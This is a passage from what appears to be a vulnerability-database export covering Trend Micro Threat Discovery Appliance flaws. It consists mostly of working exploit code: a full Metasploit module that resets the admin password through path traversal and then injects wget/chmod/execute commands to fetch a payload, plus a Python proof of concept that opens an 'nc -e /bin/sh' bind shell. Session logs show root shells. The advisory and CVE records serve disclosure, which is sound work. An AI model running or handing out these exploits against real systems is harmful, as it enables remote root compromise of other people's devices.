Rex::Socket.source_address(rhost)\r\n else\r\n srv_host = datastore['SRVHOST']\r\n end\r\n\r\n @service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri\r\n service_url_payload = srv_host + resource_uri\r\n\r\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...\")\r\n start_service({'Uri' => {\r\n 'Proc' => Proc.new { |cli, req|\r\n on_request_uri(cli, req)\r\n },\r\n 'Path' => resource_uri\r\n }})\r\n\r\n datastore['SSL'] = true if ssl_restore\r\n connect\r\n end\r\n\r\n def exec(cmd)\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/admin_sys_time.cgi'),\r\n 'cookie' => @cookie,\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'act' => 'save',\r\n 'timezone' => cmd,\r\n }\r\n }, 1)\r\n end\r\n\r\n def download_exec\r\n @bd = rand_text_alpha(8+rand(8))\r\n register_file_for_cleanup(\"/tmp/#{@bd}\")\r\n exec(\"|`wget #{@service_url} -O /tmp/#{@bd}`\")\r\n exec(\"|`chmod 755 /tmp/#{@bd}`\")\r\n exec(\"|`/tmp/#{@bd}`\")\r\n\r\n # we need to delay, for the stager\r\n select(nil, nil, nil, 5)\r\n end\r\n\r\n def do_login\r\n\r\n begin\r\n login = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logon.cgi'),\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'passwd' => datastore['PASSWORD'],\r\n 'isCookieEnable' => 1,\r\n }\r\n })\r\n\r\n # these are needed due to the reboot\r\n rescue Rex::ConnectionRefused\r\n return false\r\n rescue Rex::ConnectionTimeout\r\n return false\r\n end\r\n if login and login.code == 200 and login.body =~ /frame\\.cgi/\r\n @cookie = \"session_id=#{$1};\" if login.get_cookies =~ /session_id=(.*);/\r\n return true\r\n end\r\n return false\r\n end\r\nend\r\n=begin\r\nsaturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/trend.rc \r\n[*] Processing scripts/trend.rc for ERB directives.\r\nresource (scripts/trend.rc)> use exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi\r\nresource (scripts/trend.rc)> set RHOST 192.168.100.2\r\nRHOST => 192.168.100.2\r\nresource (scripts/trend.rc)> set payload linux/x86/meterpreter/reverse_tcp\r\npayload => linux/x86/meterpreter/reverse_tcp\r\nresource (scripts/trend.rc)> set LHOST 192.168.100.13\r\nLHOST => 192.168.100.13\r\nresource (scripts/trend.rc)> exploit\r\n[*] Exploit running as background job.\r\n[*] Started reverse TCP handler on 192.168.100.13:4444 \r\n[*] Bypassing authentication...\r\nmsf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > \r\n[+] The password has been reset!\r\n[*] Waiting for the reboot...\r\n[*] 192.168.100.2:443 - Starting up our web service on http://192.168.100.13:1337/nnDBuOUMuKnxP ...\r\n[*] Using URL: http://0.0.0.0:1337/nnDBuOUMuKnxP\r\n[*] Local IP: http://192.168.100.13:1337/nnDBuOUMuKnxP\r\n[+] Logged in\r\n[*] 192.168.100.2:443 - Sending the payload to the server...\r\n[*] Transmitting intermediate stager for over-sized stage...(105 bytes)\r\n[*] Sending stage (1495599 bytes) to 192.168.100.2\r\n[*] Meterpreter session 1 opened (192.168.100.13:4444 -> 192.168.100.2:46140) at 2016-09-23 14:59:08 -0500\r\n[+] Deleted /tmp/rpNDXQZTB\r\n[*] Server stopped.\r\nmsf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > sessions -i 1\r\n[*] Starting interaction with 1...\r\nmeterpreter > shell\r\nProcess 3846 created.\r\nChannel 1 created.\r\nBusyBox v1.00 (2010.10.13-06:52+0000) Built-in shell (ash)\r\nEnter 'help' for a list of built-in commands.\r\n/bin/sh: can't access tty; job control turned off\r\n/opt/TrendMicro/MinorityReport/www/cgi-bin # id\r\nid\r\nuid=0(root) gid=0(root)\r\n/opt/TrendMicro/MinorityReport/www/cgi-bin #\r\n=end\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92940"}, {"lastseen": "2017-11-19T11:59:30", "description": "Summary:\r\n\r\n\r\nThere exists a post authenticated command injection vulnerability that can be used to execute arbitrary code as root.\r\n\r\nNotes:\r\n\r\n\r\n- Since this is a busybox, getting a connectback seemed hard. So, for this particular PoC, all I did was \r\nexec a bind shell using netcat.\r\n- Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts...\r\n- Auth is now bypassed, please see CVE-2016-7552\r\n\r\nExample:\r\n\r\n```\r\nsaturn:trend_micro_threat_discovery_log_query_dlp_rce mr_me$ ./poc.py \r\n(+) usage: ./poc.py <target> <pass>\r\n(+) eg: ./poc.py 172.16.175.123 admin123\r\nsaturn:trend_micro_threat_discovery_log_query_dlp_rce mr_me$ ./poc.py 172.16.175.123 admin\r\n(+) logged in...\r\n(+) starting backdoor, this will take a few secs...\r\n(+) calling backdoor!\r\nid\r\nuid=0(root) gid=0(root)\r\nuname -a\r\nLinux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown\r\nexit\r\n```", "cvss3": {}, "published": "2017-04-21T00:00:00", "type": "seebug", "title": "Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dlp.cgi Command Injection Remote Code Execution Vulnerability (CVE-2016-8590)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-7552", "CVE-2016-8590"], "modified": "2017-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92986", "id": "SSV:92986", "sourceData": "\n import re\r\nimport os\r\nimport sys\r\nimport time\r\nimport requests\r\nimport threading\r\n\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nif len(sys.argv) != 3:\r\n print \"(+) usage: %s <target> <pass>\" % sys.argv[0]\r\n print \"(+) eg: %s 172.16.175.123 admin123\" % sys.argv[0]\r\n sys.exit(-1)\r\n\r\nt = sys.argv[1]\r\np = sys.argv[2]\r\n\r\nbu = \"https://%s/\" % t\r\nl_url = \"%scgi-bin/logon.cgi\" % bu\r\ne_url = \"%scgi-bin/log_query_dlp.cgi\" % bu\r\n\r\ns = requests.Session()\r\n\r\ndef exec_bd(s, e_url):\r\n # now we setup our backdoor\r\n # no reverse, since it seems to fail !?\r\n netcat = \"test|`nc -e /bin/sh -lp 1337`\"\r\n e_url += \"?act=search_advanced&cache_id=%s\" % netcat\r\n s.get(e_url, verify=False)\r\n\r\n# first we login...\r\nr = s.post(l_url, data={ \"passwd\":p, \"isCookieEnable\":1 }, verify=False)\r\nif \"frame.cgi\" in r.text:\r\n print \"(+) logged in...\"\r\n\r\n thread = threading.Thread(target=exec_bd, args=(s, e_url,))\r\n thread.start()\r\n\r\n print \"(+) starting backdoor, this will take a few secs...\"\r\n time.sleep(4)\r\n\r\n print \"(+) calling backdoor!\"\r\n os.system(\"nc %s 1337\" % t)\r\n\r\nelse:\r\n print \"(-) login failed\"\r\n sys.exit(-1)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92986", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T11:59:43", "description": "In the last few months, I have been testing several Trend Micro products with Steven Seeley ([@steventseeley](https://twitter.com/steventseeley)). Together, we have found more than 200+ RCE (Remote Code Execution) vulnerabilities and for the first time we presented the outcome of our research at [Hack In The Box 2017 Amsterdam](https://conference.hitb.org/hitbsecconf2017ams/sessions/trending-a-micro-line-how-we-found-over-100-rce-vulnerabilities-in-trend-micro-software/)\u00a0in April.\r\n\r\nThe presentation is available as a [PDF](http://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Steven%20Seeley%20and%20Roberto%20Suggi%20Liverani%20-%20I%20Got%2099%20Trends%20and%20a%20%23%20Is%20All%20Of%20Them.pdf) or as a [Slideshare](https://www.slideshare.net/robertosl81/i-got-99-trends-and-a-is-all-of-them).\r\n\r\n<iframe allowfullscreen=\"\" frameborder=\"0\" height=\"470px\" marginheight=\"0\" marginwidth=\"0\" mozallowfullscreen=\"\" scrolling=\"no\" src=\"https://www.slideshare.net/robertosl81/slideshelf\" style=\"border: none;\" webkitallowfullscreen=\"\" width=\"615px\"></iframe>\r\nSince it was not possible to cover all discovered vulnerabilities with a single presentation, this blog post will cover and analyze a further vulnerability that did not make it to the slides, and which affects the Trend Micro Threat Discovery Appliance (TDA) product.\r\n\r\n**CVE-2016-8584 - TDA Session Generation Authentication Bypass**\r\n\r\nThis was an interesting vulnerability, discovered after observing that two consecutive login attempts against the web interface returned the same session_id token. Following this observation, our inference was that time factor played a role. After further analysis and reversing of the TDA libraries, the session management was found to be defined in the following library: /opt/TrendMicro/MinorityReport/lib/mini_httpd/utils.so\r\n\r\nWithin this library, the create_session() function is of particular interest, as shown below.\r\n\r\n\r\n\r\n\r\n\r\nThis function performs the following actions:\r\n\r\n- Gets current time\r\n- Use time as \u201cseed\u201d\r\n- Use srand() with above seed\r\n- MD5 hash the rest\r\n\r\nAll these functions can be shortened as the following: _session_id = md5(srand(get_curtime()))_\r\n\r\nThe vulnerability is that the seed is predictable, and therefore an attacker can generate session IDs issued in the past.\r\n\r\nHowever, there are two conditions which affect exploitation of this vulnerability:\r\n\r\n1) A legitimate user has to be authenticated - a session token is associated with an IP address when a user logs in\r\n2) Attacker needs to perform the attack with the same IP address of legitimate user\r\n\r\nThe second condition is not an issue in a NATed environment but in a different environment it's definitely the most significant constraint.\r\n\r\nA further conclusion is that although the attacker is able to technically predict \"future\" session_id tokens, there is no point in doing that, since condition (1) has to be to met first and an association between an IP address and session_id has to exist in the database.\r\n\r\nThe exploit Proof-of-Concept (poc) has been published [here](https://gist.github.com/malerisch/0b8ecfcb03a2c2f26e5f649cf1df8d33) and below a video showing the attack in action:\r\n\r\nhttps://www.youtube.com/embed/rwmfbvvGHDw\r\n\r\nThe exploits for all the other TDA vulnerabilities that were discovered as part of this research can be found below:\r\n\r\n[CVE-2016-8584 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 (latest) Session Generation Authentication Bypass Vulnerability](https://gist.github.com/malerisch/0b8ecfcb03a2c2f26e5f649cf1df8d33)\r\n\r\n[CVE-2016-7547 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Information Disclosure Vulnerability](https://gist.github.com/malerisch/b8764501d299f2ec9eb145258d404e5f)\r\n\r\n[CVE-2016-7552 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 logoff.cgi Directory Traversal Authentication Bypass Vulnerability](https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4)\r\n\r\n[CVE-2016-8585 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 admin_sys_time.cgi Command Injection Remote Code Execution Vulnerability](https://gist.github.com/malerisch/91239147d4fceffa63006974889ef1af)\r\n\r\n[CVE-2016-8586 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 detected_potential_files.cgi Command Injection Remote Code Execution Vulnerability](https://gist.github.com/malerisch/97c160aa4e8219c7c9ad25107444a280)\r\n\r\n[CVE-2016-8587 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Remote Code Execution Vulnerability](https://gist.github.com/malerisch/aac1ad3e6f3bfd70b35ba6538ecbff23)\r\n\r\n[CVE-2016-8588 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 hotfix_upload.cgi Command Injection Remote Code Execution Vulnerability](https://gist.github.com/malerisch/93be2141dfc5709159468762937f2853)\r\n\r\n[CVE-2016-8589 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dae.cgi Command Injection Remote Code Execution Vulnerability](https://gist.github.com/malerisch/3bbb6d0b235fa5af2ba6f05826fe3846)\r\n\r\n[CVE-2016-8590 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dlp.cgi Command Injection Remote Code Execution Vulnerability](https://gist.github.com/malerisch/7b84a4bd6eee0a3a591677f421653a2e)\r\n\r\n[CVE-2016-8591 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 (latest) log_query.cgi Command Injection Remote Code Execution Vulnerability](https://gist.github.com/malerisch/5dd838a723b342bb04121f29a8333e00)\r\n\r\n[CVE-2016-8592 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 (latest) log_query_system.cgi Command Injection Remote Code Execution Vulnerability](https://gist.github.com/malerisch/0c78e49124561524fd59d6635007eefd)\r\n\r\n[CVE-2016-8593 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 (latest) upload.cgi Remote Code Execution Vulnerability](https://gist.github.com/malerisch/c59ab650c8e226ef22cdfbfeeee6d4ec)\r\n\r\nA Metasploit module has been developed and added to the master branch:\r\n\r\n[https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb)", "published": "2017-04-20T00:00:00", "type": "seebug", "title": "Trend Micro Threat Discovery Appliance - Session Generation Authentication Bypass (CVE-2016-8584)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7547", "CVE-2016-7552", "CVE-2016-8584", "CVE-2016-8585", "CVE-2016-8586", "CVE-2016-8587", "CVE-2016-8588", "CVE-2016-8589", "CVE-2016-8590", "CVE-2016-8591", "CVE-2016-8592", "CVE-2016-8593"], "modified": "2017-04-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92978", "id": "SSV:92978", "sourceData": "\n ##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution',\r\n 'Description' => %q{\r\n This module exploits two vulnerabilities the Trend Micro Threat Discovery Appliance.\r\n The first is an authentication bypass vulnerability via a file delete in logoff.cgi\r\n which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552).\r\n The second is a cmdi flaw using the timezone parameter in the admin_sys_time.cgi\r\n interface (CVE-2016-7547).\r\n Note: You have the option to use the authentication bypass or not since it requires\r\n that the server is rebooted. The password reset will render the authentication useless.\r\n Typically, if an administrator cant login, they will bounce the box. Therefore, this\r\n module performs a heart beat request until the box is bounced and then attempts to login\r\n and to perform the command injection. This module has been tested on version 2.6.1062r1\r\n of the appliance.\r\n },\r\n 'Author' =>\r\n [\r\n 'mr_me <steventhomasseeley@gmail.com>', # vuln + msf\r\n 'Roberto Suggi Liverani @malerisch', # vuln + msf\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://asciinema.org/a/112480'], # demo\r\n [ 'CVE', '2016-7552'], # auth bypass\r\n [ 'CVE', '2016-7547'], # cmdi\r\n ],\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Trend Micro Threat Discovery Appliance 2.6.1062r1', {} ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true\r\n },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Apr 10 2017'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptString.new('TARGETURI', [true, 'The target URI', '/']),\r\n OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']),\r\n OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),\r\n OptBool.new('AUTHBYPASS', [ true, 'Bypass the authentication', true ]),\r\n\r\n ], self.class)\r\n end\r\n\r\n def check\r\n if do_login\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/about.cgi'),\r\n 'cookie' => @cookie,\r\n 'method' => 'GET',\r\n }, 1)\r\n if res and res.code == 200 and res.body =~ /About Trend Micro/\r\n version = \"#{$1}\" if res.body =~ /var ver_str = new String\\(\"(.*)\"\\)/\r\n case version\r\n when /2.6.1062/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n end\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n if datastore['AUTHBYPASS']\r\n print_status(\"Bypassing authentication...\")\r\n if reset_password\r\n print_good(\"The password has been reset!\")\r\n print_status(\"Waiting for the administrator to reboot...\")\r\n pwn_after_reboot\r\n end\r\n else\r\n if do_login\r\n pwn\r\n else\r\n fail_with(Failure::NoAccess, \"Authentication failed\")\r\n end\r\n end\r\n end\r\n\r\n def reset_password\r\n c = \"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\"\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logoff.cgi'),\r\n 'method' => 'GET',\r\n 'cookie' => c,\r\n })\r\n\r\n if res and res.code == 200 and res.headers.to_s =~ /Backtrace/\r\n return true\r\n end\r\n return false\r\n end\r\n\r\n def pwn\r\n start_http_server\r\n print_good(\"Logged in\")\r\n download_exec\r\n end\r\n\r\n def pwn_after_reboot\r\n @rebooted = false\r\n while !@rebooted\r\n if do_login\r\n @rebooted = true\r\n pwn\r\n end\r\n end\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n if (not @pl)\r\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\r\n return\r\n end\r\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\r\n @elf_sent = true\r\n send_response(cli, @pl)\r\n end\r\n\r\n def start_http_server\r\n @pl = generate_payload_exe\r\n @elf_sent = false\r\n\r\n downfile = rand_text_alpha(8+rand(8))\r\n resource_uri = '/' + downfile\r\n\r\n # do not use SSL for the attacking web server\r\n if datastore['SSL']\r\n ssl_restore = true\r\n datastore['SSL'] = false\r\n end\r\n\r\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\r\n srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)\r\n else\r\n srv_host = datastore['SRVHOST']\r\n end\r\n\r\n @service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri\r\n service_url_payload = srv_host + resource_uri\r\n\r\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...\")\r\n start_service({'Uri' => {\r\n 'Proc' => Proc.new { |cli, req|\r\n on_request_uri(cli, req)\r\n },\r\n 'Path' => resource_uri\r\n }})\r\n\r\n datastore['SSL'] = true if ssl_restore\r\n connect\r\n end\r\n\r\n def exec(cmd)\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/admin_sys_time.cgi'),\r\n 'cookie' => @cookie,\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'act' => 'save',\r\n 'timezone' => cmd,\r\n }\r\n }, 1)\r\n end\r\n\r\n def download_exec\r\n @bd = rand_text_alpha(8+rand(8))\r\n register_file_for_cleanup(\"/tmp/#{@bd}\")\r\n exec(\"|`wget #{@service_url} -O /tmp/#{@bd}`\")\r\n exec(\"|`chmod 755 /tmp/#{@bd}`\")\r\n exec(\"|`/tmp/#{@bd}`\")\r\n\r\n # we need to delay, for the stager\r\n select(nil, nil, nil, 5)\r\n end\r\n\r\n def do_login\r\n\r\n begin\r\n login = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logon.cgi'),\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'passwd' => datastore['PASSWORD'],\r\n 'isCookieEnable' => 1,\r\n }\r\n })\r\n\r\n # these are needed due to the reboot\r\n rescue Rex::ConnectionRefused\r\n return false\r\n rescue Rex::ConnectionTimeout\r\n return false\r\n end\r\n if login and login.code == 200 and login.body =~ /frame\\.cgi/\r\n @cookie = \"session_id=#{$1};\" if login.get_cookies =~ /session_id=(.*);/\r\n return true\r\n end\r\n return false\r\n end\r\nend\r\n=begin\r\nsaturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/trend.rc \r\n[*] Processing scripts/trend.rc for ERB directives.\r\nresource (scripts/trend.rc)> use exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi\r\nresource (scripts/trend.rc)> set RHOST 192.168.100.2\r\nRHOST => 192.168.100.2\r\nresource (scripts/trend.rc)> set payload linux/x86/meterpreter/reverse_tcp\r\npayload => linux/x86/meterpreter/reverse_tcp\r\nresource (scripts/trend.rc)> set LHOST 192.168.100.13\r\nLHOST => 192.168.100.13\r\nresource (scripts/trend.rc)> exploit\r\n[*] Exploit running as background job.\r\n[*] Started reverse TCP handler on 192.168.100.13:4444 \r\n[*] Bypassing authentication...\r\nmsf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > \r\n[+] The password has been reset!\r\n[*] Waiting for the reboot...\r\n[*] 192.168.100.2:443 - Starting up our web service on http://192.168.100.13:1337/nnDBuOUMuKnxP ...\r\n[*] Using URL: http://0.0.0.0:1337/nnDBuOUMuKnxP\r\n[*] Local IP: http://192.168.100.13:1337/nnDBuOUMuKnxP\r\n[+] Logged in\r\n[*] 192.168.100.2:443 - Sending the payload to the server...\r\n[*] Transmitting intermediate stager for over-sized stage...(105 bytes)\r\n[*] Sending stage (1495599 bytes) to 192.168.100.2\r\n[*] Meterpreter session 1 opened (192.168.100.13:4444 -> 192.168.100.2:46140) at 2016-09-23 14:59:08 -0500\r\n[+] Deleted /tmp/rpNDXQZTB\r\n[*] Server stopped.\r\nmsf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > sessions -i 1\r\n[*] Starting interaction with 1...\r\nmeterpreter > shell\r\nProcess 3846 created.\r\nChannel 1 created.\r\nBusyBox v1.00 (2010.10.13-06:52+0000) Built-in shell (ash)\r\nEnter 'help' for a list of built-in commands.\r\n/bin/sh: can't access tty; job control turned off\r\n/opt/TrendMicro/MinorityReport/www/cgi-bin # id\r\nid\r\nuid=0(root) gid=0(root)\r\n/opt/TrendMicro/MinorityReport/www/cgi-bin #\r\n=end\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92978", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2022-02-09T20:01:50", "description": "An authentication bypass vulnerability exists in TrendMicro Threat Discovery Appliance. Successful exploitation of this vulnerability would allow remote attackers to gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-12-22T00:00:00", "type": "checkpoint_advisories", "title": "Trendmicro Threat Discovery Appliance Directory Traversal (CVE-2016-7552)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7552"], "modified": "2020-12-22T00:00:00", "id": "CPAI-2016-1038", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T15:19:38", "description": "On the Trend Micro Threat Discovery Appliance 2.6.1062r1, directory traversal when processing a session_id cookie allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-12T10:59:00", "type": "cve", "title": "CVE-2016-7552", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7552"], "modified": "2017-04-17T15:43:00", "cpe": ["cpe:/a:trendmicro:threat_discovery_appliance:2.6.1062"], "id": "CVE-2016-7552", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7552", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:55:23", "description": "log_query_dae.cgi in Trend Micro Threat Discovery Appliance 2.6.1062r1 and earlier allows remote authenticated users to execute arbitrary code as the root user via shell metacharacters in the cache_id parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-28T19:59:00", "type": "cve", "title": "CVE-2016-8589", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8589"], "modified": "2017-05-10T16:13:00", "cpe": ["cpe:/a:trendmicro:threat_discovery_appliance:2.6.1062"], "id": "CVE-2016-8589", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8589", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2017-04-20T03:25:30", "description": "", "published": "2017-04-20T00:00:00", "type": "packetstorm", "title": "Trend Micro Threat Discovery Appliance 2.6.1062r1 logoff.cgi Directory Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7552"], "modified": "2017-04-20T00:00:00", "id": "PACKETSTORM:142225", "href": "https://packetstormsecurity.com/files/142225/Trend-Micro-Threat-Discovery-Appliance-2.6.1062r1-logoff.cgi-Directory-Traversal.html", "sourceData": "`#!/usr/local/bin/python \n\"\"\" \nTrend Micro Threat Discovery Appliance <= 2.6.1062r1 logoff.cgi Directory Traversal Authentication Bypass Vulnerability \nFound by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ \nFile: TDA_InstallationCD.2.6.1062r1.en_US.iso \nsha1: 8da4604c92a944ba8f7744641bce932df008f9f9 \nDownload: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1 \n \nSummary: \n======== \n \nThere exists a pre-authenticated directory traversal vulnerability that allows an attacker to delete any folder or file as root. \nThis can result in an attacker causing a DoS or bypassing authentication. \n \nExploitation: \n============= \n \nAn attacker can use this vulnerability to bypass the authentication by reseting the default password back to 'admin'. \n \n1. Delete the config file /opt/TrendMicro/MinorityReport/etc/igsa.conf \n2. Wait for the server to be rebooted... \n \nIt is highly likely the server will be rebooted because the deletion of the config file causes a DoS condition whereby \nno-body can even login... (since the md5 hashed pw is stored in the config file). \n \nNotes: \n====== \n \n- (Un)fortunately, we were not able to find a pre-authenticated way to reboot the server, hence requiring slight user interaction (or patience) \n- No username required! \n \nExample: \n======== \n 